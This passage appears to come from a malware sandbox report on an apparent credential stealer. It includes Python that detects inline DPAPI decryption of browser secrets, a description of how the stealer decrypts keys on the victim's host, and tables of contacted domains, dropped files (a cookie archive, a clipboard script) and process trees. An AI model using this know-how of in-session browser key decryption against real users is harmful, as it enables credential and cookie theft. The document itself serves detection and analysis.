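        "alg_hash": ALG_IDS.get(alg_hash, hex(alg_hash)), "hash_bits": hash_bits,
        "hmac_salt_len": len(hmac_salt), "data_len": len(data), "sign_len": len(sign),
    }


def triage_cmdline(cmdline: str) -> dict:
    """Flag a command line that decrypts an inline DPAPI blob and describe that blob."""
    result = {"dpapi_unprotect": "ProtectedData]::Unprotect" in cmdline, "scope": None, "blob": None}
    scope = re.search(r"'(CurrentUser|LocalMachine)'", cmdline)
    if scope:
        result["scope"] = scope.group(1)
    if result["dpapi_unprotect"]:
        try:
            result["blob"] = parse_dpapi_blob(extract_byte_array(cmdline))
        except ValueError as exc:
            result["blob"] = {"error": str(exc)}
    return result
```

Run against the report's own command line, the parser recovers a version-1 blob protected with AES-256 and SHA-512, 48 bytes of ciphertext, a 64-byte signature, and the UTF-16 description "Edge"; the first blob (on the preceding powershell.exe line) has the same master key GUID and an empty description. The master key GUID and the 'CurrentUser' scope together mean the decryption only works in the victim's own logon session, which is why the stealer performs it on the host instead of exfiltrating the raw blob. As a detection, a DPAPI blob literal passed through cmd.exe /c into powershell.exe is rare in administrative tooling and worth alerting on by itself.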
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | shaderify.xyz | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 8.8.8.8:53 | 205.13.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.219.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\6fd5f1a7-81b0-4b07-9a50-3e49240a1501.tmp.node
| MD5 | 56192831a7f808874207ba593f464415 |
| SHA1 | e0c18c72a62692d856da1f8988b0bc9c8088d2aa |
| SHA256 | 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c |
| SHA512 | c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z4ek2nip.huh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4124-7-0x00000213AF5D0000-0x00000213AF5F2000-memory.dmp
C:\ProgramData\edge\Updater\Get-Clipboard.ps1
| MD5 | 52cc110bb3777aa6bba7900630d4eb49 |
| SHA1 | 3663dc658fd13d407e49781d1a5c2aa203c252fc |
| SHA256 | 892a9edb03db3fd88fecc1e1a2f56a7339f16f6734e8d77e6538ea2c8c9026d6 |
| SHA512 | 89b80d2783e902d68ffd08b6f3fb1848ae6e6c4bf2d7a1e4afdac970b2ee6ffcc58116cdd6234e3d6278eb9413d36aafe62b5beca24a0846575d12af0c5112ab |
\??\c:\Users\Admin\AppData\Local\Temp\gvzwrytg\gvzwrytg.cmdline
| MD5 | 0dad2a256aacf25ea2d570c6015d33d1 |
| SHA1 | 301639d7e32a844b25290d13ae1e09a06cf56589 |
| SHA256 | 38063aea7398717e64557d2619ec90a0725ff174cf66e2191a6d03c09fabcaa9 |
| SHA512 | 76469bfbf8b8fe87e137b87550710ea852fa91e7ba582012ea06deec2c7540cf11bbe4ab70064e99b7e178325031415c79abef82e71b80bd4959ac98b9146dd8 |
\??\c:\Users\Admin\AppData\Local\Temp\gvzwrytg\gvzwrytg.0.cs
| MD5 | b462a7b0998b386a2047c941506f7c1b |
| SHA1 | 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f |
| SHA256 | a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35 |
| SHA512 | eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020 |
\??\c:\Users\Admin\AppData\Local\Temp\gvzwrytg\CSC560CAE5A71D24B2D88A8B8609B673FC9.TMP
| MD5 | 0d66267aad53025049acbd10e4f1b994 |
| SHA1 | cdb2f831b62a9899dc10d899cac2af6c6727d6d9 |
| SHA256 | b177e4615b779ef9018f2546d3575763087e68cb59254be41aac20a7a7e4ace7 |
| SHA512 | e9459f4b0d45a46d0285d53a992f9fbbb290b7b018aabfb16727a2cc164cdffe5e12335d10e2e26513bd79e746df031630c12c2b678ee2bb9e42611cb1e931e7 |
C:\Users\Admin\AppData\Local\Temp\RES5D91.tmp
| MD5 | cbddbe67e099b2400e5c3afeb2315f17 |
| SHA1 | cc8bcf8edbfdbe6520e4b484648752ef7d0a9e43 |
| SHA256 | 5b1571e9ecbdb663625181683d64586c3ec9766a3dd59d66850bcbe7c9b1259c |
| SHA512 | c5f9a2af35455c2321f68a98660828edde4dd82724611638c351440560009c3fa1bc5fe6365403c1c6231990a7eac25b578a0f5b44882c12ee5f701ef3bea723 |
C:\Users\Admin\AppData\Local\Temp\gvzwrytg\gvzwrytg.dll
| MD5 | 5b55dc709f69b621430f4a7455417228 |
| SHA1 | 92a8727041b3ffaeb82659f52c952834ab16e89d |
| SHA256 | 805d2635a07e5920d7c3da733094872368778f077c121ff9f876ede1f4575b02 |
| SHA512 | ee521dac7b1a51f19da9abfc26861737e0aa20c1bf9e498ebceff7a0866585597e7dbf0218e699f6743b6644bba83047e48d3fed2735ae9a729561f77caf466e |
memory/4124-30-0x00000213AFA90000-0x00000213AFA98000-memory.dmp
memory/1592-43-0x0000021030E30000-0x0000021030E80000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f48896adf9a23882050cdff97f610a7f |
| SHA1 | 4c5a610df62834d43f470cae7e851946530e3086 |
| SHA256 | 3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78 |
| SHA512 | 16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 895e2a42e94e9cd0f28eaa2b6ecc01c2 |
| SHA1 | 1853f120520e8fa793825de95434557215ee0b1f |
| SHA256 | 2930446921bad0e440a607731e8488965a039dd60ef8432fbf0d2412d4e1dae7 |
| SHA512 | acd1c8d88d69788f03d50224413fcae52d026b01b6bc311570114d68aed1fbbfeac67d9361115d9386555239c50ea490985d3f375d6a3b49339b7f960154d4f0 |
memory/3320-68-0x00007FFE32950000-0x00007FFE32951000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Admincookies.zip
| MD5 | 76cdb2bad9582d23c1f6f4d868218d6c |
| SHA1 | b04f3ee8f5e43fa3b162981b50bb72fe1acabb33 |
| SHA256 | 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85 |
| SHA512 | 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f |
memory/3320-87-0x0000021BCF900000-0x0000021BCFA2A000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win10v2004-20240508-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.73.50.20.in-addr.arpa | udp |
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20231129-en
Max time kernel
120s
Max time network
129s
Command Line
Signatures
Command and Scripting Interpreter: JavaScript
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\resources\app.js
Network
Files
Analysis: behavioral19
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win10v2004-20240426-en
Max time kernel
89s
Max time network
157s
Command Line
Signatures
Command and Scripting Interpreter: JavaScript
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\resources\app.js
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:50
Platform
win7-20240215-en
Max time kernel
117s
Max time network
119s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2336 -s 220
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win10v2004-20240508-en
Max time kernel
145s
Max time network
154s
Command Line
Signatures
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffff33646f8,0x7ffff3364708,0x7ffff3364718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,10398541712313245205,2258270527647106578,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,10398541712313245205,2258270527647106578,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,10398541712313245205,2258270527647106578,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2632 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10398541712313245205,2258270527647106578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10398541712313245205,2258270527647106578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,10398541712313245205,2258270527647106578,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,10398541712313245205,2258270527647106578,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10398541712313245205,2258270527647106578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10398541712313245205,2258270527647106578,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10398541712313245205,2258270527647106578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10398541712313245205,2258270527647106578,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,10398541712313245205,2258270527647106578,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1048 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 439b5e04ca18c7fb02cf406e6eb24167 |
| SHA1 | e0c5bb6216903934726e3570b7d63295b9d28987 |
| SHA256 | 247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654 |
| SHA512 | d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2 |
\??\pipe\LOCAL\crashpad_1648_LMRTEVRMJAKVTXLU
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | a8e767fd33edd97d306efb6905f93252 |
| SHA1 | a6f80ace2b57599f64b0ae3c7381f34e9456f9d3 |
| SHA256 | c8077a9fc79e2691ef321d556c4ce9933ca0570f2bbaa32fa32999dfd5f908bb |
| SHA512 | 07b748582fe222795bce74919aa06e9a09025c14493edb6f3b1f112d9a97ac2225fe0904cac9adf2a62c98c42f7877076e409803014f0afd395f4cc8be207241 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | cd7b1a5fb9f51584a1f13ae724c04961 |
| SHA1 | 878bfcdade43f8848c358f4afaf67f3b109da8a9 |
| SHA256 | 56d2a6446822cc8337da114f5668dfad1efabeb53b0335c2ba5e99aa77bc9db4 |
| SHA512 | 1826f955484b5f6f3e2f606624057964f17108ab3648df7e510d5b05e7fdea6cbaacf826e7917604e338787b56a1b223783fc3ffd6d7dea30cfd5206e44338b6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 353181bedb842eee65507c848760ca6a |
| SHA1 | 456f11c94d4fee505fdcfa221e7c8412e2672d38 |
| SHA256 | 205405b79f4d975a7fbc0080da57797dc136b3fe7165dbb6904995bd0ff9c9fe |
| SHA512 | 5a4c6c12ac3e179610f28d44aaf8bb2e9d83d674db2740940609b832113438bb39b70ed6e81f96cccfbad924459fb8e1228eea3811799cdc5720a7f9d1cd7eb1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e2508b88a180310e89c4d6dc6fafc6a0 |
| SHA1 | 120cd01e31c9daa3f4370c037833ba5ccf3c5b5d |
| SHA256 | 4cd61fea979dc26ee02dfcccb167f61ef020278d508c4d9c381c0789b188ecf7 |
| SHA512 | 5ee244dd01c62993c7d37b5da5343f2b32918cd42984a45160b1fcdb60d260c6b0f98dce45ac9af478be990cbe03e196d6b3601fcbd2a9a831a9f047a9744125 |